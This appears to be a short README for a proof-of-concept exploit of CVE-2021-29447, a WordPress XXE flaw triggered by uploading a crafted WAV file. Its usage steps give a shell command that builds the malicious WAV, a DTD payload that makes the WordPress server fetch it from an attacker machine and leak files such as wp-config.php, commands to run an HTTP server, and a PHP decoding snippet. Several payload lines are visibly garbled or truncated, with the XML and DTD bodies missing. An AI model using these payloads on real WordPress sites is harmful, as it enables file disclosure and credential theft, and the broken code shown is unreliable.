# CVE-2021-29447 * Upload of wav file has following consequences * **Arbitrary File Disclosure** for example `wp-config.php` * **Server Side Request Forgery** ## Usage * Create `wav` Payload ```sh echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00:/NAMEEVIL.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav ``` * Create `dtd` Payload, which is downloaded from attacker machine by the wp instance. Following payload ```sh :/?p=%file;'>" > ``` * Launch http server ```sh php -S 0.0.0.0:8000 python -m http.server ``` * Copy returned base64 into `php` file ```php ')); ?> ```